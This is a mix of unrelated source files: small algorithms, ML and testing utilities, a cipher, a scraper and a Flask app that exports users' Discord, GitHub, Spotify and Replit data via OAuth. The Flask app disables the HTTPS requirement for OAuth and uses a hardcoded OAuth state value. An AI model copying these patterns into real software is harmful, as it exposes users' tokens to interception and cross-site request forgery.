x_id, x_ct = np.unique(x, return_counts=True)
p_x = [ct / sum(ct) for ct in [np.unique(x, return_counts=True)[1]]]
gini = [1 - np.sum(p ** 2) for p in
[ct / sum(ct) for ct in [np.unique(y[x == i], return_counts=True)[1] for i in x_id]]]
return np.sum(np.array(p_x) * np.array(gini))
# Gini index for a continuous feature; x is the feature, y is the target flag
def giniS(y, x):
    # cast the feature values to float
    x = x.astype(float)
    # sort the feature values
sorted_x = np.sort(x)
split_point_list = []
split_point_gini = []
    # candidate split points: midpoints between consecutive sorted values
for i in range(0, len(sorted_x) - 1, 1):
split_point_list.append(np.mean([sorted_x[i], sorted_x[i + 1]]))
    # compute the Gini index produced by each candidate split point
for i in split_point_list:
        # after splitting at i the feature becomes binary
xi = pd.Series.copy(x)
xi[xi <= i] = 0
xi[xi > i] = 1
        # weights (relative frequencies) of the two sides of the split
w_i = [[p for p in ct / np.sum(ct)] for ct in [np.unique(xi, return_counts=True)[1]]]
        # the two split groups
x_id, x_ct = np.unique(xi, return_counts=True)
        # Gini of each group for this split point
gini_x_id = [np.sum([(p - p ** 2) for p in ct / np.sum(ct)]) for ct in
[np.unique(y[xi == i], return_counts=True)[1] for i in x_id]]
        # weighted Gini for this split point
gini = Decimal(str(np.sum(w_i * np.array(gini_x_id)))).quantize(Decimal('0.0000'),ROUND_HALF_UP)
split_point_gini.append(gini)
    # pack the results into a dict {split_point: gini}
split_point_gini_dict = dict(zip(split_point_list, split_point_gini))
return split_point_gini_dict
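# Hedged usage sketch for the two Gini helpers above (toy data are assumed
# values): giniC takes a discrete feature, giniS scans candidate split points of
# a continuous feature and returns {split_point: gini}.
def _gini_example():
    y = np.array([0, 0, 1, 1])
    x_discrete = np.array(['a', 'a', 'b', 'b'])
    x_continuous = pd.Series([1.0, 2.0, 3.0, 4.0])
    pure_split = giniC(x_discrete, y)      # 0.0: each group of x is pure in y
    split_scores = giniS(y, x_continuous)  # lowest (best) Gini at split point 2.5
    return pure_split, split_scores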
| kshsky/PycharmProjects | machinelearning/tools/mlTools.py | mlTools.py | py | 8,384 | python | en | code | 0 | github-code | 36 |
3458272947 | # -*- coding: utf-8 -*-
# @Time : 2020/6/1 16:16
# @Author : piguanghua
# @FileName: binary_search.py
# @Software: PyCharm
#title: binary-search
#Number:704
class Solution:
#def search(self, nums: List[int], target: int) -> int:
def search(self, nums, target):
start = 0
end = len(nums) - 1
        while start + 1 < end: # exit when start and end are adjacent or equal
#mid = int( ( start + end) / 2 )
mid = start + (end - start) // 2
if nums[mid] == target:
start = mid
elif nums[mid] > target:
end = mid
else:
start = mid
if nums[start] == target:
return start
elif nums[end] == target:
return end
else:
return -1
if __name__ == '__main__':
nums, target = [1, 3, 5, 6], 7
print(Solution().search(nums, target)) | pi408637535/Algorithm | com/study/algorithm/binary_search/binary_search.py | binary_search.py | py | 905 | python | en | code | 1 | github-code | 36 |
71002375784 | """
46. Write a program that reads a positive three-digit integer (from 100 to 999)
and generates another number formed by the digits of the number read, reversed.
"""
try:
    valor = int(input('Enter a three-digit integer (from 100 to 999): '))
    if (valor >= 100) and (valor <= 999):
        x = str(valor)
        print(x[::-1])
    else:
        print('ERROR!!! You did not enter a three-digit integer (from 100 to 999)')
except ValueError:
    print('ERROR!!! The value entered must be an integer') | Kaiquenakao/Python | Variáveis e Tipos de Dados em Python/Exercicio46.py | Exercicio46.py | py | 516 | python | pt | code | 5 | github-code | 36 |
40586478771 | from fastapi import APIRouter, Depends, status
from sqlalchemy.ext.asyncio import AsyncSession
from src.authentication import AuthModel, get_token_user
from src.core.exceptions import UnprocessableEntityException
from src.db.postgres import get_db
from .dependencies import get_token_parent
from .parents.crud import parent_crud
from .parents.models import ParentModel
from .parents.schemes import ResponseParentScheme, UpdateParentScheme
router = APIRouter()
@router.get(
path="/me",
summary="View a personal profile",
response_model=ResponseParentScheme,
)
async def watch_me(
parent: ParentModel = Depends(get_token_parent),
):
return parent
@router.patch(
path="/me",
summary="Update a personal profile",
response_description="Successful Response returns only status code 200",
)
async def update_me(
*,
db: AsyncSession = Depends(get_db),
parent: ParentModel = Depends(get_token_parent),
update_data: UpdateParentScheme,
):
update_data = update_data.dict(exclude_none=True)
if not update_data:
return None
_, err = await parent_crud.update(db, parent, update_data)
if err is not None:
raise UnprocessableEntityException(detail=err)
return None
@router.delete(
path="/me",
summary="Delete a personal profile",
status_code=status.HTTP_204_NO_CONTENT,
response_description="Successful Response returns only status code 204",
)
async def delete_me(
db: AsyncSession = Depends(get_db),
auth_user: AuthModel = Depends(get_token_user),
):
await parent_crud.delete_auth(db, auth_user.email)
return None
| Xewus/KidEdVisor | backend/src/parents/router.py | router.py | py | 1,626 | python | en | code | 0 | github-code | 36 |
74649269864 | # -*- coding: utf-8 -*-
# @Project : selenium_event
# @File : test_alert.py
# @Software: PyCharm
# @Author : Lizhipeng
# @Email : 1907878011@qq.com
# @Time : 2021/9/26 17:16
from selenium.webdriver import ActionChains
from seleium_study.selenium_js.base import Base
class TestAlert(Base):
def test_alert(self):
self.driver.get('https://www.runoob.com/try/try.php?filename=jqueryui-api-droppable')
        # switch into the frame
self.driver.switch_to.frame('iframeResult')
top = self.driver.find_element_by_xpath('//*[@id="draggable"]')
end = self.driver.find_element_by_xpath('//*[@id="droppable"]')
        # drag element top onto element end
action = ActionChains(self.driver)
action.drag_and_drop(top, end).perform()
        # switch focus to the alert and click its OK button
self.driver.switch_to.alert.accept()
        # switch back to the default content
self.driver.switch_to.default_content()
self.driver.find_element_by_xpath('//*[@id="submitBTN"]').click()
| iospeng/python | pycharm_demo/selenium_event/seleium_study/selenium_file_alert/test_alert.py | test_alert.py | py | 1,036 | python | en | code | 0 | github-code | 36 |
2391690633 | from threading import Thread
from flask import Flask, request, redirect, session, render_template, send_file, Response, flash
from flask_session import Session
import os, json
from bs4 import BeautifulSoup, SoupStrainer
import requests, lxml, cchardet
app = Flask(__name__)
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)
from requests_oauthlib import OAuth2Session
import getpass
import random, string, asyncio
import os
import shutil
app.config['GITHUB_CLIENT_ID'] = os.environ['GITHUB_CLIENT_ID']
app.config['GITHUB_CLIENT_SECRET'] = os.environ['GITHUB_CLIENT_SECRET']
# Disable SSL requirement
os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'
# Settings for your app
base_discord_api_url = 'https://discordapp.com/api'
client_id = os.environ['DISCORD_CLIENT_ID'] # Get from https://discordapp.com/developers/applications
client_id.encode('unicode_escape')
client_secret = os.environ['DISCORD_CLIENT_SECRET']
redirect_uri='https://DataPak.coolcodersj.repl.co/oauth_callback'
scope = ['identify', 'email', 'connections', 'guilds', 'applications.builds.read']
token_url = 'https://discord.com/api/oauth2/token'
authorize_url = 'https://discord.com/api/oauth2/authorize'
app.secret_key = os.environ['APP_SECRET_KEY'].encode('utf-8')
@app.route("/")
def home():
if 'discord_token' not in session.keys():
disc = ""
else:
discord = OAuth2Session(client_id, token=session['discord_token'])
response = discord.get(base_discord_api_url + '/users/@me')
disc = response.json()['username'] + "#" + response.json()['discriminator']
if not "gh_token" in session.keys():
gh = ""
else:
r = requests.get("https://api.github.com/user", headers={
"Authorization": f"token {session['gh_token']}"
})
gh = r.json()['login']
if not "spotify_token" in session.keys():
spotify = ""
else:
r = requests.get("https://api.spotify.com/v1/me", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
if "error" in r.json() and r.json()['error']['message'] == "The access token expired":
spotify_client_id, spotify_client_secret = os.environ['SPOTIFY_CLIENT_ID'], os.environ['SPOTIFY_CLIENT_SECRET']
r = requests.post("https://accounts.spotify.com/api/token", data={
"grant_type": "refresh_token",
"refresh_token": session['spotify_refresh_token'],
"redirect_uri": "https://datapak.coolcodersj.repl.co/spotify/callback",
'client_id': spotify_client_id,
"client_secret": spotify_client_secret
})
session['spotify_token'] = r.json()['access_token']
if "refresh_token" in r.json():
session['spotify_refresh_token'] = r.json()['refresh_token']
r = requests.get("https://api.spotify.com/v1/me", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
spotify = r.json()['display_name']
return render_template("index.html", replitusername=request.headers['X-Replit-User-Name'], discordusername=disc, gh=gh, spotify=spotify)
@app.route('/discord')
def discord():
oauth = OAuth2Session(client_id, redirect_uri=redirect_uri, scope=scope)
login_url, state = oauth.authorization_url(authorize_url)
session['state'] = state
return redirect(login_url)
@app.route("/oauth_callback")
def oauth_callback():
print(type(client_id))
discord = OAuth2Session(client_id, redirect_uri=redirect_uri, state=session['state'], scope=scope)
token = discord.fetch_token(
token_url,
client_secret=client_secret,
authorization_response=request.url,
)
session['discord_token'] = token
return redirect("/")
@app.route("/discord/generate")
def gendisc():
if not 'discord_token' in session:
disc = ""
return redirect("/")
else:
discord = OAuth2Session(client_id, token=session['discord_token'])
response1 = discord.get(base_discord_api_url + '/users/@me')
response2 = discord.get(base_discord_api_url + '/users/@me/connections')
response3 = discord.get(base_discord_api_url + '/users/@me/guilds')
disc = {"account": response1.json(), "connections": response2.json(), "guilds": response3.json()}
resp = Response(json.dumps(disc))
resp.headers['Content-Type'] = 'application/json'
return resp
@app.route('/discord/info')
def discordinfo():
return render_template("discordinfo.html")
@app.route('/replit/info')
def replitinfo():
return render_template("replitinfo.html")
@app.route("/replit/generate")
def replit():
try:
username = request.headers['X-Replit-User-Name']
os.remove(f'DataPak{username}.zip')
except:
pass
globals()['replurls'] = []
def findrepls(r):
global replurls
if r.status_code == 200:
soup = BeautifulSoup(r.content, "lxml")
btn = soup.find_all('a', class_='jsx-688104393')
repls = soup.find_all("a", class_='repl-item-wrapper')
for g in repls:
globals()['replurls'].append(str(g['href']))
if btn != []:
r = requests.get(f"https://replit.com{btn[0]['href']}")
findrepls(r)
else:
return
r = requests.get(f"https://replit.com/@{request.headers['X-Replit-User-Name']}")
findrepls(r)
username = request.headers['X-Replit-User-Name']
os.mkdir(f"DataPak{username}")
for repl in replurls:
r = requests.get(f'https://replit.com{repl}.zip')
    f = open(f'DataPak{username}/{repl.split("/")[-1]}.zip', "wb")
    f.write(r.content)
    f.close()
r = requests.get(f"https://replit.com/data/profiles/{request.headers['X-Replit-User-Name']}").json()
  del r['repls']
  f = open(f'DataPak{username}/account.json', "w")
  json.dump(r, f)
  f.close()
shutil.make_archive(f'DataPak{username}', 'zip', f'DataPak{username}/')
shutil.rmtree(f'DataPak{username}/')
return send_file(f'DataPak{username}.zip', mimetype="application/zip", as_attachment=True)
@app.route('/spotify/info')
def spotinfo():
return render_template('spotifyinfo.html')
@app.route('/spotify')
def spot():
client_id, client_secret = os.environ['SPOTIFY_CLIENT_ID'], os.environ['SPOTIFY_CLIENT_SECRET']
scopes = [
'user-read-recently-played',
'user-top-read',
'user-read-playback-position',
'user-read-playback-state',
'user-read-currently-playing',
'playlist-read-private',
'playlist-read-collaborative',
'user-follow-read',
'user-follow-modify',
'user-library-read',
'user-read-email',
'user-read-private',
]
scopes = " ".join(scopes)
if not "spotify_token" in session.keys():
return redirect(f"https://accounts.spotify.com/authorize?response_type=code&client_id={client_id}&scope={scopes}&redirect_uri=https://datapak.coolcodersj.repl.co/spotify/callback")
else:
artists = requests.get("https://api.spotify.com/v1/me/following?type=artist", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
if artists.text == "":
artists = {"None": "None"}
else:
if "message" in artists.json() and artists.json()['message'] == "The access token expired":
client_id, client_secret = os.environ['SPOTIFY_CLIENT_ID'], os.environ['SPOTIFY_CLIENT_SECRET']
r = requests.post("https://accounts.spotify.com/api/token", data={
"grant_type": "refresh_token",
"refresh_token": session['spotify_refresh_token'],
"redirect_uri": "https://datapak.coolcodersj.repl.co/spotify/callback",
'client_id': client_id,
"client_secret": client_secret
})
session['spotify_token'] = r.json()['access_token']
if "refresh_token" in r.json():
session['spotify_refresh_token'] = r.json()['refresh_token']
artists = requests.get("https://api.spotify.com/v1/me/following?type=artist", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
    # guard: if the response body was empty above, `artists` is already a plain dict
    artists = [] if isinstance(artists, dict) else artists.json()['artists']['items']
albums = []
album_req = requests.get("https://api.spotify.com/v1/me/albums", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in album_req.json()['items']:
albums.append(item)
while "next" in album_req.json() and album_req.json()['next'] != None:
album_req = requests.get(album_req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in album_req.json()['items']:
albums.append(item)
playlists = []
playlist_req = requests.get("https://api.spotify.com/v1/me/playlists", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in playlist_req.json()['items']:
playlists.append(item)
while "next" in playlist_req.json() and playlist_req.json()['next'] != None:
playlist_req = requests.get(playlist_req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in playlist_req.json()['items']:
playlists.append(item)
liked_songs = []
track_req = requests.get("https://api.spotify.com/v1/me/tracks", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in track_req.json()['items']:
liked_songs.append(item)
while "next" in track_req.json() and track_req.json()['next'] != None:
track_req = requests.get(track_req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in track_req.json()['items']:
liked_songs.append(item)
liked_episodes = []
episode_req = requests.get("https://api.spotify.com/v1/me/episodes", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in episode_req.json()['items']:
liked_episodes.append(item)
while "next" in episode_req.json() and episode_req.json()['next'] != None:
episode_req = requests.get(episode_req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in episode_req.json()['items']:
liked_episodes.append(item)
shows = []
show_req = requests.get("https://api.spotify.com/v1/me/shows", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in show_req.json()['items']:
shows.append(item)
while "next" in show_req.json() and show_req.json()['next'] != None:
show_req = requests.get(show_req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in show_req.json()['items']:
shows.append(item)
top_tracks = []
track_req = requests.get("https://api.spotify.com/v1/me/top/tracks", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in track_req.json()['items']:
top_tracks.append(item)
while "next" in track_req.json() and track_req.json()['next'] != None:
track_req = requests.get(track_req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in track_req.json()['items']:
top_tracks.append(item)
top_artists = []
    artist_req = requests.get("https://api.spotify.com/v1/me/top/artists", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in artist_req.json()['items']:
top_artists.append(item)
while "next" in artist_req.json() and artist_req.json()['next'] != None:
artist_req = requests.get(artist_req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in artist_req.json()['items']:
top_artists.append(item)
current_playback = requests.get("https://api.spotify.com/v1/me/player", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
if current_playback.text == '':
current_playback = {"error": "Nothing was playing while backing up."}
else:
current_playback = current_playback.json()
devices = requests.get("https://api.spotify.com/v1/me/player/devices", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
if devices.text == '':
devices = {"error": "No devices available."}
else:
devices = devices.json()
recently_played = []
req = requests.get("https://api.spotify.com/v1/me/player/recently-played", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in req.json()['items']:
recently_played.append(item)
while "next" in req.json() and req.json()['next'] != None:
req = requests.get(req.json()['next'], headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
for item in req.json()['items']:
recently_played.append(item)
profile = requests.get("https://api.spotify.com/v1/me", headers={
"Authorization": f"Bearer {session['spotify_token']}"
})
username = profile.json()['display_name']
os.mkdir(f"DataPak{username}/")
f = open(f"DataPak{username}/library.json", "w")
print({"artists": artists, "albums": albums, "playlists": playlists, "liked_songs": liked_songs, "liked_episodes": liked_episodes, "shows": shows, "top_tracks": top_tracks, "top_artists": top_artists}, file=f)
f.close()
f = open(f"DataPak{username}/playback.json", "w")
print({"current_playback": current_playback, "devices": devices, "recently_played": recently_played}, file=f)
f.close()
f = open(f"DataPak{username}/profile.json", "w")
print(profile.json(), file=f)
f.close()
shutil.make_archive(f'DataPak{username}', 'zip', f'DataPak{username}/')
shutil.rmtree(f'DataPak{username}/')
return send_file(f'DataPak{username}.zip', mimetype="application/zip", as_attachment=True)
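# The route above repeats the same fetch-then-follow-"next" pagination block for each
# Spotify endpoint. A helper like this hypothetical sketch (not used by the original
# routes) could collect any paged endpoint of the shape {"items": [...], "next": url}:
def collect_paged(url, token):
  items = []
  while url:
    page = requests.get(url, headers={"Authorization": f"Bearer {token}"}).json()
    items.extend(page.get("items", []))
    url = page.get("next")
  return items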
@app.route('/spotify/callback')
def spotcallback():
code = request.args.get("code")
client_id, client_secret = os.environ['SPOTIFY_CLIENT_ID'], os.environ['SPOTIFY_CLIENT_SECRET']
r = requests.post("https://accounts.spotify.com/api/token", data={
"grant_type": "authorization_code",
"type": "authorization_code",
"code": code,
"redirect_uri": "https://datapak.coolcodersj.repl.co/spotify/callback",
'client_id': client_id,
"client_secret": client_secret
})
session['spotify_token'] = r.json()['access_token']
session['spotify_refresh_token'] = r.json()['refresh_token']
return redirect('/')
@app.route('/github/info')
def ghinfo():
return render_template("ghinfo.html")
@app.route('/github')
def github():
if not "gh_token" in session:
state = "irajfvnqehrtdfwbejktrbnvfbiwkjetrnfgcwkjenrsflwejkbtnfjbrethvbw3urskejg"
session['state'] = state
return redirect(f"https://github.com/login/oauth/authorize?state={state}&client_id={os.environ['GITHUB_CLIENT_ID']}&scope=repo read:repo_hook read:org read:public_key gist user read:discussion read:packages read:gpg_key&redirect_uri=https://DataPak.coolcodersj.repl.co/github/callback")
else:
r = requests.get("https://api.github.com/user", headers={
"Authorization": f"token {session['gh_token']}"
})
account = r.json()
r = requests.get(f"https://api.github.com/users/{account['login']}/followers", headers={
"Authorization": f"token {session['gh_token']}"
})
followers = r.json()
r = requests.get(f"https://api.github.com/users/{account['login']}/following", headers={
"Authorization": f"token {session['gh_token']}"
})
following = r.json()
r = requests.get(f"https://api.github.com/users/{account['login']}/gists", headers={
"Authorization": f"token {session['gh_token']}"
})
gists = r.json()
r = requests.get(f"https://api.github.com/users/{account['login']}/starred", headers={
"Authorization": f"token {session['gh_token']}"
})
starred = r.json()
r = requests.get(f"https://api.github.com/users/{account['login']}/subscriptions", headers={
"Authorization": f"token {session['gh_token']}"
})
watchlist = r.json()
r = requests.get(f"https://api.github.com/users/{account['login']}/orgs", headers={
"Authorization": f"token {session['gh_token']}"
})
organizations = r.json()
r = requests.get(f"https://api.github.com/users/{account['login']}/repo", headers={
"Authorization": f"token {session['gh_token']}"
})
repos = r.json()
os.mkdir(f"DataPak{account['login']}/")
print(account, file=open(f"DataPak{account['login']}/account.json", "w"))
print(followers, file=open(f"DataPak{account['login']}/followers.json", "w"))
print(following, file=open(f"DataPak{account['login']}/following.json", "w"))
print(gists, file=open(f"DataPak{account['login']}/gists.json", "w"))
print(starred, file=open(f"DataPak{account['login']}/starred.json", "w"))
print(watchlist, file=open(f"DataPak{account['login']}/watchlist.json", "w"))
print(organizations, file=open(f"DataPak{account['login']}/orgs.json", "w"))
print(repos, file=open(f"DataPak{account['login']}/repos.json", "w"))
username = account['login']
for repo in repos:
name = repo['name']
branch = repo['default_branch']
r = requests.get(f'https://github.com/{username}/{name}/archive/refs/heads/{branch}.zip')
      # write the raw bytes; printing the bytes repr into a text file would corrupt the zip
      with open(f'DataPak{username}/{name}.zip', "wb") as f:
        f.write(r.content)
shutil.make_archive(f'DataPak{username}', 'zip', f'DataPak{username}/')
shutil.rmtree(f'DataPak{username}/')
return send_file(f'DataPak{username}.zip', mimetype="application/zip", as_attachment=True)
@app.route('/github/callback')
def authorized():
code = request.args.get("code")
r = requests.post("https://github.com/login/oauth/access_token", data={
"client_id": os.environ['GITHUB_CLIENT_ID'],
"client_secret": os.environ['GITHUB_CLIENT_SECRET'],
"code": code,
"state": session['state']
},
headers={
"Accept": "application/json"
})
session['gh_token'] = r.json()['access_token']
return redirect("/")
app.run(host="0.0.0.0", port=8080) | CoolCoderSJ/DataPak | main.py | main.py | py | 17,220 | python | en | code | 3 | github-code | 36 |
11904574293 | def printGrid(grid):
for row in grid:
print("".join([str(i) for i in row]))
def copyGrid(grid):
return [row.copy() for row in grid]
def isInRange(grid, r, c):
return r >= 0 and r < len(grid) and c >= 0 and c < len(grid[0])
def flash(grid, alreadyFlashed, r, c):
if grid[r][c] <= 9 or (r, c) in alreadyFlashed:
return
# print("Flash: " + str((r,c)))
alreadyFlashed.add((r, c))
for i in range(r-1, r+2):
for j in range(c-1, c+2):
if isInRange(grid, i, j):
grid[i][j] += 1
flash(grid, alreadyFlashed, i, j)
def isSynced(grid):
for i in range(len(grid)):
for j in range(len(grid[0])):
if grid[i][j] != 0:
return False
return True
def simulate(grid, numSteps):
flashCount = 0
flashed = set()
sync = False
step = 0
while not sync:
step += 1
# increase every energy level
for i in range(len(grid)):
for j in range(len(grid[0])):
grid[i][j] += 1
# flash
for i in range(len(grid)):
for j in range(len(grid[0])):
flash(grid, flashed, i, j)
        # any octopus that flashed should be set to 0
for r, c in flashed:
grid[r][c] = 0
flashCount += len(flashed)
flashed = set()
sync = isSynced(grid)
return step
def solve(file):
grid = [[int(s) for s in list(l.strip())] for l in open(file).readlines()]
step = simulate(grid, 100)
print(step)
solve("inputs/11/full.txt") | ianlayzer/adventofcode2021 | code/11.py | 11.py | py | 1,607 | python | en | code | 0 | github-code | 36 |
12676975577 | import mlflow
import dvc.api
import pandas as pd
def yield_artifacts(run_id, path=None):
"""Yield all artifacts in the specified run"""
client = mlflow.tracking.MlflowClient()
for item in client.list_artifacts(run_id, path):
if item.is_dir:
yield from yield_artifacts(run_id, item.path)
else:
yield item.path
def fetch_logged_data(run_id):
"""Fetch params, metrics, tags, and artifacts in the specified run"""
client = mlflow.tracking.MlflowClient()
data = client.get_run(run_id).data
# Exclude system tags: https://www.mlflow.org/docs/latest/tracking.html#system-tags
tags = {k: v for k, v in data.tags.items() if not k.startswith("mlflow.")}
artifacts = list(yield_artifacts(run_id))
return {
"params": data.params,
"metrics": data.metrics,
"tags": tags,
"artifacts": artifacts,
}
def dvc_open(path, url, branch):
with dvc.api.open(
        path = path, ## path to the data file
        repo = url, ## GitHub repo URL
        rev = branch ## currently a branch name
) as f:
return pd.read_csv(f, sep=",")
def find_experiment_id(experiment_name):
current_experiment = dict(mlflow.get_experiment_by_name(experiment_name))
return current_experiment["experiment_id"]
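# Hedged usage sketch (the run id, file path, repo URL and experiment name below are
# placeholders, not values taken from this project):
#
#   logged = fetch_logged_data(run_id)
#   print(logged["metrics"], logged["artifacts"])
#   df = dvc_open("data/train.csv", "https://github.com/user/repo", "main")
#   exp_id = find_experiment_id("bike-share")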
| robert-min/bike_share_mlflow | model/utils.py | utils.py | py | 1,317 | python | en | code | 0 | github-code | 36 |
17579968573 | import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from numpy import *
import sys
file_name = sys.argv[1]
data1 = loadtxt("./" + file_name)
NUM=data1[:,0]  # first column: problem size n
TIME=data1[:,1]  # second column: measured running time
fig = plt.figure()
top = fig.add_subplot(111) # 1 row, 1 column, figure 1
top.set_title('BRUTE FORCE')
top.grid()
top.set_xlabel('n')
top.set_ylabel('time')
top.plot(NUM, TIME)
#top.text(200,35,"Steps: "+str(int(STEPS)))
plt.savefig('fatt-brute-force.pdf')
#plt.show()
| UnProgrammatore/CCQ | altre_cose/fattorizzazione_mpi_banale_print/plot.py | plot.py | py | 480 | python | en | code | 0 | github-code | 36 |
27511187637 | a=["Arun","Sri","Kavi"]
b=["male","female","female"]
c=["married","married","single"]
for i in range(0,len(a)):
if(b[i]=="male"):
print("mr:",a[i])
elif(c[i]=="single"):
print("Ms:",a[i])
else:
print("Mrs:",a[i])
| kavi234/GUVI | Zen Class/day 8/listif.py | listif.py | py | 259 | python | en | code | 0 | github-code | 36 |
11029799743 |
def fun(*args):
res = sum(args)
return res
def my_range(*args):
    # mimic range()'s (stop) / (start, stop) / (start, stop, step) call signatures
    if len(args) == 1:
        start = 0
        stop = args[0]
        step = 1
    elif len(args) == 2:
        start = args[0]
        stop = args[1]
        step = 1
    elif len(args) == 3:
        start = args[0]
        stop = args[1]
        step = args[2]
    else:
        raise TypeError("my_range expects 1 to 3 arguments")
    return list(range(start, stop, step))
args = (1, 2, 4, 7)
val = fun(1, 2, 2, 1, 100, 20)
print(val) | pymft/mft-vanak-archive-october-2018 | S05/functions/test.py | test.py | py | 404 | python | en | code | 0 | github-code | 36 |
34189683080 | #!/usr/bin/env python
# coding: utf-8
# # Pandas Lab Exercise
#
#
# ## Part - 1
# We shall now test your skills in using Pandas package. We will be using the [games Dataset](https://www.kaggle.com/gutsyrobot/games-data/data) from Kaggle.
#
# Answer each question asked below wrt the games dataset.
# ** Import pandas as pd.**
# In[1]:
import pandas as pd
# ** Read games.csv as a dataframe called games.**
# In[2]:
games = pd.read_csv("games.csv")
# ** Check the head of the DataFrame. **
# In[3]:
games.head()
# ** Use .info() method to find out total number of entries in dataset**
# In[4]:
games.info()
# **What is the mean playing time for all games put together?**
# In[6]:
games['playingtime'].mean()
# ** What is the highest number of comments received for a game? **
# In[7]:
games['total_comments'].max()
# ** What is the name of the game with id 1500? **
# In[8]:
games[games['id']==1500]['name']
# ** And which year was it published? **
# In[9]:
games[games['id']==1500]['yearpublished']
# ** Which game has received highest number of comments? **
# In[10]:
games[games['total_comments']==games['total_comments'].max()]
# ** Which games have received least number of comments? **
# In[11]:
games[games['total_comments']==games['total_comments'].min()]
# ** What was the average minage of all games per game "type"? (boardgame & boardgameexpansion)**
# In[13]:
games.groupby('type')['minage'].mean()
# ** How many unique games are there in the dataset? **
# In[14]:
games['id'].nunique()
# ** How many boardgames and boardgameexpansions are there in the dataset? **
# In[15]:
games['type'].value_counts()
# ** Is there a correlation between playing time and total comments for the games? - Use the .corr() function **
# In[18]:
games[['playingtime','total_comments']].corr()
# In[ ]:
| Pragati-Gawande/100-days-of-code | Day_13/Kaggle Games Dataset.py | Kaggle Games Dataset.py | py | 1,876 | python | en | code | 5 | github-code | 36 |
26823163714 | from math import trunc
a = 159 # Key 1
b = 580 # Key 2
n = 26 # Alphabet size
plaintext = 'no' # Plaintext
def encrypt(a,b,n,plaintext):
alphabet = None
ciphertext = ''
p = 0
if(n == 26):
alphabet = 'abcdefghijklmnopqrstuvwxyz'
elif(n == 45):
        alphabet = 'abcdefghijklmnopqrstuvwxyz!£$%^&*()0123456789'  # 45 symbols, matching n == 45
elif(n == 122):
alphabet = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ \t\n\r\x0b\x0c'
alphabet = list(alphabet)
plaintext = list(plaintext)
    x = alphabet.index(plaintext[0])
    y = alphabet.index(plaintext[1])
    p = x*n + y  # encode the two-letter block as a single base-n number
    n2 = n*n
    p = (a*p+b) % n2  # affine map over the digraph space
    x = trunc(p / n)
    y = trunc(p % n)
ciphertext = ciphertext + alphabet[x]
ciphertext = ciphertext + alphabet[y]
print(ciphertext)
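# Hedged sketch of the inverse mapping (not part of the original file): it assumes the
# n == 26 alphabet used above, a two-character ciphertext, gcd(a, n*n) == 1 for the key,
# and Python 3.8+ for pow(a, -1, m).
def decrypt(a, b, n, ciphertext):
    alphabet = list('abcdefghijklmnopqrstuvwxyz')
    n2 = n * n
    a_inv = pow(a, -1, n2)  # modular inverse of the multiplier
    c = alphabet.index(ciphertext[0]) * n + alphabet.index(ciphertext[1])
    p = (a_inv * (c - b)) % n2  # undo c = (a*p + b) mod n^2
    return alphabet[p // n] + alphabet[p % n]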
encrypt(a,b,n,plaintext) | PadraigHalstead/Cryptography | Ciphers/Classical */Affine Cipher */Strengthened Affine */Encrypt.py | Encrypt.py | py | 858 | python | en | code | 0 | github-code | 36 |
31982185532 | import requests
from bs4 import BeautifulSoup
from datetime import datetime
import os.path
import csv
import threading
from queue import Queue
# Proxies for BURP - update requests if you want to use this proxy
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
playersFile = 'sample_corrected.txt'
ids = Queue()
# Please be nice to the PDGA site :)
THREADS = 1
class Player:
def __init__(self, pdga):
self.store = []
self.failure = False
self.pdga = pdga
r = requests.get(f'https://www.pdga.com/player/{pdga}')
soup = BeautifulSoup(r.text, 'html.parser')
pi = soup.find('ul', class_='player-info info-list')
self.today = datetime.now().strftime("%d/%m/%Y %H:%M:%S")
# if access denied|page not found go to next player
self.check_failures(soup)
if self.failure:
return
player = soup.h1.get_text()
# Fields that will always exist for all members
self.name = player.split(' #')[0].replace(',', ' ')
self.status = pi.find('li', class_='membership-status').text.split('Status: ')[1].split(' ')[0]
# The remaining fields may not be on the profile so I had to check to see if they exist before parsing
expiration = pi.find('li', class_='membership-status').text.split('Status: ')[1]
if 'until' in expiration:
self.expiration = expiration.split('until ')[1].replace(')', '')
else:
self.expiration = expiration.split('as of ')[1].replace(')', '')
self.joindate = pi.find('li', class_='join-date')
if self.joindate:
self.joindate = self.joindate.text.split('Member Since: ')[1].split(' ')[0]
else:
self.joindate = ''
try:
location = pi.find('li', class_='location').text.split('Classification:')[0].split('Location: ')[1].split(
',')
except:
location = ''
if location:
# City, State, Country
if len(location) >= 3:
self.city = location[0].lstrip()
self.state = location[1].lstrip()
self.country = location[2].split('Member Since: ')[0].lstrip()
# Only State/Prov, Country
if len(location) == 2:
self.city = 'N/A'
self.state = location[0].lstrip()
self.country = location[1].split('Member Since: ')[0].lstrip()
# Country Only
if len(location) == 1:
self.city = 'N/A'
self.state = 'N/A'
self.country = location[0].split('Member Since: ')[0].lstrip()
